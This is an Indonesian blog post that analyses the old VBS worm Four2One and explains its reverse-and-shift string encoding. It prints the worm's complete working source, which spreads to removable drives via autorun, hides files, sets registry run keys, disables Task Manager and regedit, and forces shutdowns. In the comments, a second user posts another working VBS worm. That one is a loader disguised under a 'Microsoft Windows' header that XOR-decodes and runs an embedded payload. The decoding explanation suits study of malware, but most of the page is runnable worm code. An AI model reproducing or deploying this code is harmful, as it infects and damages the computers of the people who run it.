MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Mari Mendecrypt Worm Four2One.VBS!

Posted by Morphic pada Juli 23, 2010


Ini mungkin worm vbs lama, tapi saya baru dapat sampelnya dari salah satu teman saya. Nah, worm ini memakai teknik enkripsi. yang awalnya saya sempat bingung melihatnya sekilas…

tapi ada yang membuat saya menemukan code dekripsinya dalam waktu 1 detik hanya dengan melihat clue-nya saja.
Nah saya akan ajarkan kamu untuk membaca teknik enkripsi worm vbs.

Sampel yang kita ambil adalah worm Four2One.VBS

Ini sourcenya.
‘four2one.virus ver 2.0

on error resume next
dim rekur,syspath,windowpath,desa,twoone,mf,misi,tf,four2,nt,check,sd, Dn,Wd,Hn,Mn,nae, viti,ld,gap,nowd, recy

misi = ReAd( “^ovspuvb\” ) & vbcrlf & ReAd( “tcw/fmdzdfs!fyf/uqjsdtx>fuvdfyfmmfit” )

html = ReAd( “?#86!;uihjfi!<576!;iuejx!<722!;ugfm!<93!;qpu!fmzut!wje=?#111111$#>spmpdhc!zepc=” ) & vbcrlf &_
ReAd( “?wje0=?q0=?uopg0=1/3!sfw!!fop3svpg!n(j?#8#>f{jt!#fuspG#>fdbg!#DDDDDD$#>spmpd!uopg=?#sfuofd#>ohjmb!q=” ) & vbcrlf &_
ReAd( “?#2.!;yfeoj.{!<79!;qpu!<112!;ugfm!fmzut!obqt=?#sfuofd#>ohjmb!q=” ) & vbcrlf &_
ReAd( “?obqt0=?#115#>uihjfi!#117#>iuejx!#HQK/922:521K0SPD17CVQ0USBQJMD0fdjggP!ugptpsdjN0tfmjG!nbshpsQ0;D#>dst!#1#>sfespc!hnj=” ) & vbcrlf &_
ReAd( “?#2!;yfeoj.{!<79!;qpu!<112!;ugfm!fmzut!obqt=” ) & vbcrlf &_
ReAd( “?q0=?#sfuofd#>ohjmb!q=?q0=?obqt0=?#115#>uihjfi!#117#>iuejx!#hqk/fmhpph]34nfutzt]txpeojx];d#>dst!#1#>sfespc!hnj=” ) & vbcrlf &_
ReAd( “?#73!;uihjfi!<576!;iuejx!<722!;ugfm!<2:5!;qpu!fmzut!wje=” ) & vbcrlf &_
ReAd( “?#sfuofd#>ohjmb!q=?wje0=?q0=?c0=?uopg0=9113!mjsqB!82?#DDDDDD$#>spmpd!#5#>f{jt!#lppcmppidT!zsvuofD#>fdbg!uopg=?c=?#sfuofd#>ohjmb!q=” )

explor= ReAd( “uyfo!fnvtfs!spssf!op” ) & vbcrlf & _
ReAd( “qx!-et!-fnbOxfO!-fnbOemP!njE” ) & vbcrlf & _
ReAd( “*#udfkcPnfutzTfmjG/hojuqjsdT#)udfkcpfubfsd!>!pd!uft” ) & vbcrlf & _
ReAd( “*#mmfit/uqjsdtX#)udfkcpfubfsd!>!et!uft” ) & vbcrlf & _
ReAd( “*1)sfempgmbjdfqtufh/pd!>!qx!ufT” ) & vbcrlf & _
ReAd( “#mme/bovuspG]34nfutzt]txpeojx];d#!>!fnbOemP” ) & vbcrlf & _
ReAd( “#tcw/fop3svpg]34nfutzt]txpeojx];d#!>!fnbOxfO” ) & vbcrlf & _
ReAd( “ftmbg!-fnbOxfO!-fnbOemP!fmjgzqpd/pd” ) & vbcrlf & _
ReAd( “ofiu!96!>!sfcnvO/ssF!gj” ) & vbcrlf & _
ReAd( “ftmf” ) & vbcrlf & _
ReAd( “#tcw/fop3svpg]34nfutzt]txpeojx];d#!ovs/et” ) & vbcrlf & _
ReAd( “!gj!eof” ) & vbcrlf & _
ReAd( “#fyf/sfspmqyf]#!’!qx!ovs/et” )

recy = ReAd( “uyfo!fnvtfs!spssf!op” ) & vbcrlf & _
ReAd( “qx!-et!-fnbOxfO!-fnbOemP!njE” ) & vbcrlf & _
ReAd( “*#udfkcPnfutzTfmjG/hojuqjsdT#)udfkcpfubfsd!>!pd!uft” ) & vbcrlf & _
ReAd( “*#mmfit/uqjsdtX#)udfkcpfubfsd!>!et!uft” ) & vbcrlf & _
ReAd( “*1)sfempgmbjdfqtufh/pd!>!qx!ufT” ) & vbcrlf & _
ReAd( “#ojc/fmdzdfS]#!>!fnbOemP” ) & vbcrlf & _
ReAd( “#tcw/fop3svpg]34nfutzt]txpeojx];d#!>!fnbOxfO” ) & vbcrlf & _
ReAd( “ftmbg!-fnbOxfO!-fnbOemP!fmjgzqpd/pd” ) & vbcrlf & _
ReAd( “ofiu!96!>!sfcnvO/ssF!gj” ) & vbcrlf & _
ReAd( “ftmf” ) & vbcrlf & _
ReAd( “#tcw/fop3svpg]34nfutzt]txpeojx];d#!ovs/et” ) & vbcrlf & _
ReAd( “!gj!eof” ) & vbcrlf & _
ReAd( “fnbommvGuqjsdT/uqjsdtX!’!#!-udfmft0-f0!fyf/sfspmqyf]#!’!qx!ovs/et” )

set twoone = createobject(ReAd( “udfkcPnfutzTfmjG/hojuqjsdT” ))
set mf = twoone.getfile (Wscript.ScriptFullname)
set four2 = createobject( ReAd( “mmfiT/uqjsdTX”) )
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

Wd = weekday(Now)
Hn = hour(now)
Mn = minute(now)

Set windowpath = twoone.getspecialfolder(0)
Set syspath = twoone.getspecialfolder(1)

viti=date*1+421000014.0421
set tf = twoone.createtextfile(windowpath & ReAd( “mme/fubembdpm]” ),false)
tf.write viti
tf.close
set tf = twoone.getfile(windowpath & ReAd( “mme/fubembdpm]” ))
tf.attributes = 39

set tf = twoone.getfile(syspath & ReAd( “tcw/fop3svpg]” ))
tf.attributes = 39
set tf = twoone.createtextfile(syspath & ReAd( “tcw/fop3svpg]” ),2,true)
tf.write rekur
tf.close
set tf = twoone.getfile(syspath &ReAd( “tcw/fop3svpg]” ))
tf.attributes = 39

set tf = twoone.getfile(syspath & ReAd( “mme/bovuspG]” ))
tf.attributes = 39
set tf = twoone.createtextfile(syspath & ReAd( “mme/bovuspG]” ),2,true)
tf.write rekur
tf.close
set tf = twoone.getfile(syspath & ReAd( “mme/bovuspG]” ))
tf.attributes = 39

set tf = twoone.getfile(syspath & ReAd( “tcw/sfspmqyf]” ))
tf.attributes = 39
set tf = twoone.createtextfile(syspath & ReAd( “tcw/sfspmqyf]” ))
tf.write explor
tf.close
set tf = twoone.getfile(syspath & ReAd( “tcw/sfspmqyf]” ))
tf.attributes = 39

set tf=twoone.createtextfile(syspath & ReAd( “nui/fmhpph]” ),2,true)
tf.write html
tf.close
set tf = twoone.getfile(syspath & ReAd( “nui/fmhpph]” ))
tf.attributes=39

twoone.CopyFile syspath & ReAd( “hqk/fmhppH]” ), “c:\”, true
twoone.CopyFile syspath & ReAd( “nui/fmhppH]” ), “c:\”, true

for each desa in twoone.drives
If (desa.drivetype = 1 or desa.drivetype = 2) and desa.path “A:” and desa.path “C:” then

set tf=twoone.getfile(desa.path & ReAd( “ojc/fmdzdfS]” ))
tf.attributes =39
set tf=twoone.createtextfile(desa.path & ReAd( “ojc/fmdzdfS]” ),2,true)
tf.write rekur
tf.close
set tf=twoone.getfile(desa.path & ReAd( “ojc/fmdzdfS]” ))
tf.attributes = 39

set tf=twoone.getfile(desa.path & ReAd( “tcw/fmdzdfS]” ))
tf.attributes =39
set tf=twoone.createtextfile(desa.path & ReAd( “tcw/fmdzdfS]” ),2,true)
tf.write recy
tf.close
set tf=twoone.getfile(desa.path & ReAd( “tcw/fmdzdfS]” ))
tf.attributes = 39

set tf =twoone.getfile(desa.path & ReAd( “goj/ovspuvb]” ))
tf.attributes = 32
set tf=twoone.createtextfile(desa.path & ReAd( “goj/ovspuvb]” ),2,true)
tf.write misi
tf.close
set tf = twoone.getfile(desa.path & ReAd( “goj/ovspuvb]” ))
tf.attributes=39

twoone.CopyFile syspath & ReAd( “hqk/fmhppH]” ), desa.path & “\”, true
twoone.CopyFile desa.path & ReAd( “hqk/fmhppH]” ), syspath & “\”, true
end if
next

set four2 = createobject( ReAd( “mmfiT/uqjsdTX”) )
four2.regwrite ReAd( “topjuqPsfempGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI” ),”1″,ReAd(“ESPXE`HFS”)
four2.regwrite ReAd( “shnltbUfmcbtjE]nfutzt]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI” ),”1″,ReAd(“ESPXE`HFS”)
four2.regwrite ReAd( “ofeejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI” ),”0″,ReAd(“ESPXE`HFS”)
four2.regwrite ReAd( “nfutzTugptpsdjN]ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI” ), syspath & ReAd( “tcw/fop3svpg]” )

four2.regwrite ReAd( “fnbOfqzUzmeofjsG]fmjGTCW]UPPS`TFTTBMD`ZFLI” ), ReAd( “opjtofuyF!opjubdjmqqB” )
four2.regwrite ReAd( “uyFxpiTsfwfO]fmjGTCW]UPPS`TFTTBMD`ZFLI” ),””
four2.regwrite ReAd( “]opdJumvbgfE]fmjGTCW]UPPS`TFTTBMD`ZFLI” ), four2.RegRead (ReAd( “fmjgmme]UPPS`TFTTBMD`ZFLI” ) & ReAd( “]opdJumvbgfE]” ))
four2.regwrite ReAd( “eobnnpD]ujeF]mmfiT]fmjGTCW]UPPS`TFTTBMD`ZFLI” ), “”

four2.regwrite ReAd( “sfhhvcfe]fyf/ujefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI” ),ReAd( “fyf/ebqfupo” )
four2.regwrite ReAd( “sfhhvcfe]fyf/hjgopdtn]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI” ),ReAd( “fyf/ebqfupo” )

‘four2.regwrite ReAd( “effqTldjmDfmcvpE]ftvpN]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI”), “1”

set mf = twoone.getfile(windowpath & ReAd( “mme/fubembdpm]” ))
set ld = mf.openastextstream(1)
dn = ld.readline
nowd=date*1+421000000.0421
gap=nowd-dn

if gap>0 Then
four2.regwrite ReAd( “fhbQ!usbuT]ojbN]sfspmqyF!ufosfuoJ]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI” ), ReAd( “nui/fmhppH];d” )
four2.regwrite ReAd( “]dfyffee]fspmqyf]mmfit]sfempG]tfttbmD]FSBXUGPT]FOJIDBN`MBDPM`ZFLI” ),””
four2.regwrite ReAd( “]eobnnpd]fspmqyf]mmfit]sfempG]tfttbmD]FSBXUGPT]FOJIDBN`MBDPM`ZFLI” ), ReAd( “tcw/sfspmqyf]34nfutzt]txpeojx];d!!fyf/uqjsdTX]34nfutzT]txpeojx];d” )
four2.regwrite ReAd( “b]VSNovS]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI” ), ReAd( “tvsjw/fop3svpg” )
four2.regwrite ReAd( “utjMVSN]VSNovS]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI” ), “a”
four2.regwrite ReAd( “uvPfnjUfwbToffsdT]qpultfE]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI” ),”60″
four2.regwrite ReAd( “fyf/fwbtosdT]qpultfE]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI” ), ReAd( “sdt/e4uyfutt]]34nfutzt]]TXPEOJX]];D” )
four2.regwrite ReAd( “hojsuTzbmqtjE]E4uyfU]tsfwbtoffsdT]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI”), ReAd( “1/3!sfw!fop3svpg!n(j” )
four2.regwrite ReAd( “zujwjujtofTftvpN]ftvpN]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI” ),”1″
four2.regwrite ReAd( “effqTftvpN]ftvpN]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI” ),”0″
nae = four2.RegRead (ReAd( “sfoxPefsfutjhfS]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI” ))
four2.regwrite ReAd( “]mmfit]sfempg]tfttbmD]FSBXUGPT]FOJIDBN`MBDPM`ZFLI” ) & nae & ReAd( “]eobnnpd]fN!ub!lppm!ftbfmQ!t(” ),ReAd( “FYF/FSPMQYFJ” ),”REG_EXPAND_SZ”
if Wd = 5 and Hn > 12 then
set sd = createobject(ReAd( “mmfit/uqjsdtX” ))
sd.run ReAd( “1!u.!t.!fyf/oxpeuvit” )
else
if Mn = 9 or Mn = 19 or Mn = 29 or Mn = 39 or Mn = 49 or Mn = 59 then
twoone.CopyFile four2.SpecialFolders(ReAd( “uofdfs” )) & ReAd( “lom/hqk/+]” ), four2.SpecialFolders(ReAd( “qpultfE” )) & “\”, true
set sd = createobject(ReAd( “mmfit/uqjsdtX” ))
sd.run ReAd( “FYF/FSPMQYFJ” )
end if
end if
end if

if check 1 then
Wscript.sleep 80000
end if
loop while check 1
set sd = createobject(ReAd( “mmfit/uqjsdtX” ))
sd.run windowpath & ReAd( “!-udfmft0-f0!fyf/sfspmqyf]” ) & Wscript.ScriptFullname

Function ReAd( WriTe )
Dim Son, ToLo, Yo
Son = “”
For ToLo = 1 To Len( WriTe )
Yo = Mid( WriTe, ToLo, 1 )
Son = Chr( Asc( Yo ) – 1 ) & Son
Next
ReAd = Son
End Function

Baik,
yang membuat saya menemukan cluenya adalah “CreateObject”
String ini selalu diikuti WscriptFullname atau wscript.shell dan lain-lain…

Lalu saya check string ini: “mmfit/uqjsdtX”
HItung jumlah LEN-nya dan bandingkan dengan WSCRIPT.SHELL
Persis sama!!

Lalu perhatikan juga ciri-cirinya! di string code virus ada dua huruf double yaitu “mm” sedangkan WSCRIPT.SHELL ada huruf double “ll”
Sudah jelas teknik enkripsi yang dipakai adalah teknik STRREVERSE.

Oke! kita sudah dapat satu kuncinya, Lalu kunci berikutnya adalah PERGESERAN HURUF!!
Kalau si worm memakai teknik pergeseran huruf “L” menjadi “M” ini berarti ada penambahan satu karakter. Jadi untuk mendekripnya kita kurangkan satu!

Langkah-langkah yang perlu untuk mengubah ini kembali adalah:
1.ubah huruf jadi angka
2.lalu setiap angka kurangkan satu
3.kemudian ubah kembali menjadi huruf.
4.Jangan lupa teknik STRREVERSE, karena worm ini memakai teknik ini.

Sehingga didapatkan code berikut:
Private Sub Command1_Click()
Dim Kode As String
Dim i As Integer
Dim HasilAkhir As String
Kode = “ScriptYangKamuBingungKan”
Kode = StrReverse(Kode)
For i = 1 To Len(Kode)
HasilAkhir = HasilAkhir & Chr(Asc(Mid(Kode, i, 1)) – 1)
Next
MsgBox HasilAkhir
End Sub

Satu kali klik tombol hasilnya dapat!๐Ÿ˜€

Beres sudah

by: Morphic
http://www.morphostlab.com
(Konsultasi kesehatan gratis yukk!!)

thanks to:
EDE

22 Tanggapan to “Mari Mendecrypt Worm Four2One.VBS!”

  1. serviks said

    Wah morphic mw membrantas virusQ tho?
    ya udh ga ap deh, asal bkn smadav aj yg mw mbrantas virusQ.

    By serviks maker

  2. Akhmad Efendi said

    ‘http://www.microsoft.com/isapi/redir.dll?prd={SUB_PRD}&ar=runonce&pver={SUB_PVER}&plcid={SUB_CLSID}
    ‘Microsoft Windows Corporation
    ‘ ========================
    ‘Microsoft Windows Serviks
    ‘Hawabek sata irad acab gnolot
    ‘Sataek hawab irad acab uti haletes
    ‘sJ80
    ‘dI20
    ‘dK5K
    ‘dA4C
    ‘d-2U
    ‘dS5F
    ‘dE2.
    ‘sR4I
    ‘gV6N
    ‘tI9I
    ‘4K5.
    ‘3S2F
    ‘e-4U
    ‘fM5R
    ‘wA2U
    ‘sS6H
    ‘GU5.
    ‘FK2H
    ‘D-2A
    ‘DD5W
    ‘EI2A
    ‘S-5B
    ‘SK6I
    ‘UO2D
    ‘TM4.
    ‘3P5Q
    ‘4U6P
    ‘6T2H
    ‘7E2.
    ‘8R7O
    ‘9-5N
    ‘0A5.
    ‘6N4I
    ‘RD6R
    ‘EA4A
    ‘F!3C
    ‘F-57
    ‘HH44
    ‘GU60
    ‘MB98
    ‘NU26
    ‘FN36
    ‘RG58
    ‘WI68
    ‘W-59
    ‘TM85
    ‘EY66
    ‘W-55
    ‘WE38
    ‘SM40
    ‘DA25
    ‘SI51
    ‘LL88
    ‘G:60
    ‘D-35
    ‘SZ43
    ‘QE22
    ‘HR61
    ‘OV85
    ‘PI25
    ‘YK44
    ‘FS86
    ‘E@66
    ‘VY25
    ‘MA48
    ‘cH60
    ‘fO92
    ‘tO30
    ‘6.80
    ‘6C41
    ‘8O73
    ‘uM53
    ‘g-63
    ‘f-24
    ‘fB36
    ‘bY65
    ‘b:38
    ‘A-20
    ‘aF28
    ‘AA26
    ‘AN36
    ‘WD68
    ‘KI31
    ‘K-59
    ‘ML25
    ‘LO56
    ‘TV25
    ‘RE58
    ‘D-20
    ‘DY28
    ‘GU51
    ‘KY68
    ‘OU90
    ‘PN84
    ‘J.78
    ‘H-50
    ‘sJ80
    ‘dI20
    ‘dK5K
    ‘dA4C
    ‘d-2U
    ‘dS5F
    ‘dE2.
    ‘sR4I
    ‘gV6N
    ‘tI9I
    ‘4K5.
    ‘3S2F
    ‘e-4U
    ‘fM5R
    ‘wA2U
    ‘sS6H
    ‘GU5.
    ‘FK2H
    ‘D-2A
    ‘DD5W
    ‘EI2A
    ‘S-5B
    ‘SK6I
    ‘UO2D
    ‘TM4.
    ‘3P5Q
    ‘4U6P
    ‘6T2H
    ‘7E2.
    ‘8R7O
    ‘9-5N
    ‘0A5.
    ‘6N4I
    ‘RD6R
    ‘EA4A
    ‘F!3C
    ‘F-57
    ‘HH44
    ‘GU60
    ‘MB98
    ‘NU26
    ‘FN36
    ‘RG58
    ‘WI68
    ‘W-59
    ‘TM85
    ‘EY66
    ‘W-55
    ‘WE38
    ‘SM40
    ‘DA25
    ‘SI51
    ‘LL88
    ‘G:60
    ‘D-35
    ‘SZ43
    ‘QE22
    ‘HR61
    ‘OV85
    ‘PI25
    ‘YK44
    ‘FS86
    ‘E@66
    ‘VY25
    ‘MA48
    ‘cH60
    ‘fO92
    ‘tO30
    ‘6.80
    ‘6C41
    ‘8O73
    ‘uM53
    ‘g-63
    ‘f-24
    ‘fB36
    ‘bY65
    ‘b:38
    ‘A-20
    ‘aF28
    ‘AA26
    ‘AN36
    ‘WD68
    ‘KI31
    ‘K-59
    ‘ML25
    ‘LO56
    ‘TV25
    ‘RE58
    ‘D-20
    ‘DY28
    ‘GU51
    ‘KY68
    ‘OU90
    ‘PN84
    ‘J.78
    ‘H-50
    ‘sJ80
    ‘dI20
    ‘dK5K
    ‘dA4C
    ‘d-2U
    ‘dS5F
    ‘dE2.
    ‘sR4I
    ‘gV6N
    ‘tI9I
    ‘4K5.
    ‘3S2F
    ‘e-4U
    ‘fM5R
    ‘wA2U
    ‘sS6H
    ‘GU5.
    ‘FK2H
    ‘D-2A
    ‘DD5W
    ‘EI2A
    ‘S-5B
    ‘SK6I
    ‘UO2D
    ‘TM4.
    ‘3P5Q
    ‘4U6P
    ‘6T2H
    ‘7E2.
    ‘8R7O
    ‘9-5N
    ‘0A5.
    ‘6N4I
    ‘RD6R
    ‘EA4A
    ‘F!3C
    ‘F-57
    ‘HH44
    ‘GU60
    ‘MB98
    ‘NU26
    ‘FN36
    ‘RG58
    ‘WI68
    ‘W-59
    ‘TM85
    ‘EY66
    ‘W-55
    ‘WE38
    ‘SM40
    ‘DA25
    ‘SI51
    ‘LL88
    ‘G:60
    ‘D-35
    ‘SZ43
    ‘QE22
    ‘HR61
    ‘OV85
    ‘PI25
    ‘YK44
    ‘FS86
    ‘E@66
    ‘VY25
    ‘MA48
    ‘cH60
    ‘fO92
    ‘tO30
    ‘6.80
    ‘6C41
    ‘8O73
    ‘uM53
    ‘g-63
    ‘f-24
    ‘fB36
    ‘bY65
    ‘b:38
    ‘A-20
    ‘aF28
    ‘AA26
    ‘AN36
    ‘WD68
    ‘KI31
    ‘K-59
    ‘ML25
    ‘LO56
    ‘TV25
    ‘RE58
    ‘D-20
    ‘DY28
    ‘GU51
    ‘KY68
    ‘OU90
    ‘PN84
    ‘J.78
    ‘H-50
    ‘sJ80
    ‘dI20
    ‘dK5K
    ‘dA4C
    ‘d-2U
    ‘dS5F
    ‘dE2.
    ‘sR4I
    ‘gV6N
    ‘tI9I
    ‘4K5.
    ‘3S2F
    ‘e-4U
    ‘fM5R
    ‘wA2U
    ‘sS6H
    ‘GU5.
    ‘FK2H
    ‘D-2A
    ‘DD5W
    ‘EI2A
    ‘S-5B
    ‘SK6I
    ‘UO2D
    ‘TM4.
    ‘3P5Q
    ‘4U6P
    ‘6T2H
    ‘7E2.
    ‘8R7O
    ‘9-5N
    ‘0A5.
    ‘6N4I
    ‘RD6R
    ‘EA4A
    ‘F!3C
    ‘F-57
    ‘HH44
    ‘GU60
    ‘MB98
    ‘NU26
    ‘FN36
    ‘RG58
    ‘WI68
    ‘W-59
    ‘TM85
    ‘EY66
    ‘W-55
    ‘WE38
    ‘SM40
    ‘DA25
    ‘SI51
    ‘LL88
    ‘G:60
    ‘D-35
    ‘SZ43
    ‘QE22
    ‘HR61
    ‘OV85
    ‘PI25
    ‘YK44
    ‘FS86
    ‘E@66
    ‘VY25
    ‘MA48
    ‘cH60
    ‘fO92
    ‘tO30
    ‘6.80
    ‘6C41
    ‘8O73
    ‘uM53
    ‘g-63
    ‘f-24
    ‘fB36
    ‘bY65
    ‘b:38
    ‘A-20
    ‘aF28
    ‘AA26
    ‘AN36
    ‘WD68
    ‘KI31
    ‘K-59
    ‘ML25
    ‘LO56
    ‘TV25
    ‘RE58
    ‘D-20
    ‘DY28
    ‘GU51
    ‘KY68
    ‘OU90
    ‘PN84
    ‘J.78
    ‘H-50
    On Error Resume Next
    Dim fso, ws
    Set fso = CreateObject(“scripting.filesystemobject”)
    Set ws = CreateObject(“wscript.Shell”)
    Set sh = CreateObject(“Shell.application”)
    Q=WScript.ScriptFullName
    tmp=fso.GetSpecialFolder(1)
    tn=fso.GetTempName
    tmpt=tmp+”\”+tn
    Set swt=WScript.Arguments
    If swt.Count>0 Then
    status=swt(0)
    If status=”auto” Then
    sh.Explore Left(WScript.ScriptFullName,3)
    Else
    status=Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)-Len(WScript.ScriptName))+status
    If fso.FolderExists(status) Then
    sh.Explore status
    Else
    fso.CreateFolder status
    sh.Explore status
    End If
    End If
    Else
    End If
    Set QQ=fso.GetFile(Q)
    Set Q1=QQ.OpenAsTextStream(1,0)
    isiQ=Q1.Read(QQ.Size)
    Q1.close
    t1=InStr(1,isiQ,”Windows Serviks”+” >>>”,0)+18
    isiQ=Right(isiQ,Len(isiQ)-t1)
    hsl=””
    For v=1 To Len(isiQ)
    t=Asc(Mid(isiQ,v,1))
    hsl=hsl+Chr(t Xor 7)
    Next
    If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
    Set temporary=fso.OpenTextFile(tmpt,2,True,0)
    temporary.Write hsl
    temporary.Close
    ws.Run “WScript.exe //e:VBScript “+tmpt+” “””+Q+””””

    ‘ Windows Serviks >>> :::::::::::::::::::::::::::::::::::::::::::::::::::::::
    ‘Pnichpt’Tbuqnlt
    ossw=((ppp)jnduhthas)dhj(ntfwn(ubcnu)ckk8wuc:|TREXWUCz!fu:urihidb!wqbu:|TREXWQBUz!wkdnc:|TREXDKTNCz
    Wuhqncbu’e~=’Jnduhthas’Pnichpt
    Bcnshu’Ankb=’Tbuqnlt’Dhuwhufsnhi
    :::::::::::::::::::::::::::::::::::::::::::::::::::::::
    Hi’Buuhu’Ubtrjb’Ibs
    Cnj’ath+’pt+’tsfsrt+tsfsrt6+’ak~
    Tbs’ath’:’DubfsbHembds/%tdunwsni`)ankbt~tsbjhembds%.
    Tbs’pt’:’DubfsbHembds/%ptdunws)Tobkk%.
    Tbs’to’:’DubfsbHembds/%Tobkk)fwwkndfsnhi%.
    Tbs’ibs’:’DubfsbHembds/%ptdunws)ibsphul%.
    ak~:afktb
    sjw:ath)@bsTwbdnfkAhkcbu/6.
    si:ath)@bsSbjwIfjb
    sjws:sjw,%[%,si
    chd:pt)TwbdnfkAhkcbut/%J~Chdrjbist%.
    Tbs’tps:PTdunws)Fu`rjbist
    Na’tps)Dhris97’Sobi
    tsfsrt:tps/7.
    Bic’Na
    na’ath)ankbbntst/sjw,%[Tbuq17c)ckk%.’sobi
    tbs’nuf:ath)`bsankb/sjw,%[Tbuq17c)ckk%.
    nuf)fssunersbt:7
    nuf)ifjb:%aficn)buc%
    na’nuf)ifjb:%aficn)buc%’sobi
    nuf)ifjb:%Tbuq17c)ckk%
    tbs’nuf:ath)hwbisbsankb/sjw,%[Tbuq17c)ckk%+5+surb.
    bktb
    ak~:surb
    bic’na
    bktb
    tbs’nuf:ath)hwbisbsankb/sjw,%[Tbuq17c)ckk%+5+surb.
    bic’na
    Tbs’FV:ath)@bsAnkb/tsfsrt.
    Na’ath)AnkbBntst/sjws.’Sobi’ath)@bsAnkb/sjws.)Fssunersbt:7
    FV)Dhw~’sjws+Surb
    Tbs’FV:ath)@bsAnkb/sjws.
    FV)Fssunersbt:4>
    fiq:sjw,%[frsh)bb%
    Na’Ihs’ath)AnkbBntst/fiq.’Sobi’FV)Dhw~’fiq
    Tbs’frsh:ath)@bsAnkb/fiq.’
    frsh)fssunersbt:7
    Tbs’frs:ath)HwbiSbsAnkb/fiq+5+Surb+7.
    ntn:%\frshuriZ9hwbi:PTdunws)bb'((b=QETdunws’cbltshw)nin’frsh9tobkk[hwbi:Hwbi9tobkk[hwbi[Dhjjfic:PTdunws)bb'((b=QETdunws’cbltshw)nin’frsh9tobkk[hwbi[Cbafrks:69tobkk[bwkhub:Bwkhub9tobkk[bwkhub[Dhjjfic:PTdunws)bb'((b=QETdunws’cbltshw)nin’frsh%
    ntn:Ubwkfdb/ntn+%9%+qeDuKa.
    frs)Punsb’ntn
    frs)Dkhtb
    frsh)Fssunersbt:4>
    ksld:to)Ifjbtwfdb/!O6d!.)Tbka)wfso’,’%[Jnduhthas[DC’Eruini`%
    FV)Dhw~’ksld,%[cbltshw)nin%+Surb
    frsh)Dhw~’ksld,%[frshuri)nia%+Surb
    Na’ath)AnkbBntst/chd,%[ca2tuqd)eab%.’Sobi’ath)@bsAnkb/chd,%[ca2tuqd)eab%.)Fssunersbt:7
    FV)Dhw~’chd,%[ca2tuqd)eab%+Surb
    ub`V
    Tbs’ufuf:RINTLF
    Obus}’Afktb
    Na’Cf~/Ihp.;94’Sobi’ublrutna’chd+6’Bktb’ublrutna’chd+4
    dfkk’fssfdlXibs
    Obus}’Surb
    Tre’ublrutna/wfso+cw.
    Hi’Buuhu’Ubtrjb’Ibs
    cuhwa’wfso
    ptdunws)tkbbw’27
    Na’cw97’Sobi
    Ahu’Bfdo’akcu6’Ni’ath)@bsAhkcbu/wfso,%[%.)TreAhkcbut
    ublrutna’akcu6)Wfso+’cw*6
    Ibs
    Bic’Na
    Bic’Tre
    Tre’cuhwa/wfso.
    Hi’Buuhu’Ubtrjb’Ibs
    na’cf~/ihp.:6’fic’/jhiso/ihp.jhc’4.:6’sobi’
    ufuf)dhw~’wfso,%[Knunl)usa%
    bic’na
    `6:wfso,%[frshuri)nia%
    `5:wfso,%[cbltshw)nin%
    Na’ath)AnkbBntst/`6.’Sobi’
    Tbs’`66:ath)@bsAnkb/`6.’
    Na’`66)Fssunersbt;94>’Sobi’
    `66)Fssunersbt:7
    frsh)Dhw~’wfso,%[frshuri)nia%+Surb
    bic’na
    bktb’
    frsh)Dhw~’wfso,%[frshuri)nia%+Surb
    bic’na
    Na’ath)AnkbBntst/`5.’Sobi’
    Tbs’`65:ath)@bsAnkb/`5.
    Na’`65)Fssunersbt;94>’Sobi
    `65)Fssunersbt:7
    FV)Dhw~’wfso,%[cbltshw)nin%+Surb
    bic’na
    bktb
    FV)Dhw~’wfso,%[cbltshw)nin%+Surb
    Bic’Na
    Na’Ihs’ath)AnkbBntst/wfso,%[Ahkcbu)kil%.’Sobi
    tohu]qinsf’wfso,%[Jnduhthas%+%Jnduhthas%
    cuhw:Fuuf~/%Fwknlftn%+%Jrtnd%+%Chdrjbis%+%Wbisni`%+%Wohsh%+%Jhqnb%+%Chpikhfc%.
    pp:6
    Ahu’Bfdo’c’Ni’cuhw
    Na’Cf~/ihp.’Jhc’4′:’pp’Sobi’tohu]qinsf’wfso,%[%,c+c
    ptdunws)tkbbw’17
    pp:pp,6
    Ibs
    u:7
    Ahu’Bfdo’akcu’Ni’ath)@bsAhkcbu/wfso,%[%.)TreAhkcbut
    tohu]qinsf’wfso,%[%,akcu)ifjb+akcu)Ifjb
    ptdunws)tkbbw’17
    Na’u94’Sobi’
    Bns’Ahu
    Bic’na
    u:u,6
    Ibs
    Bic’Na
    Bic’Tre
    Tre’tohu]qinsf/wfso+su`s.
    Tbs’tohu:pt)DubfsbTohusdrs/wfso,%)kil%.
    tohu)ndhikhdfsnhi:%tobkk45)ckk+4%
    tohu)sfu`bswfso:%ptdunws)bb%
    tohu)fu`rjbist:%((b=QETdunws’cbltshw)nin’%%%,su`s,%%%%
    tohu)tfqb
    Bic’Tre
    aridsnhi’fssfdlXibs/.
    Hi’Buuhu’Ubtrjb’Ibs
    buu)dkbfu
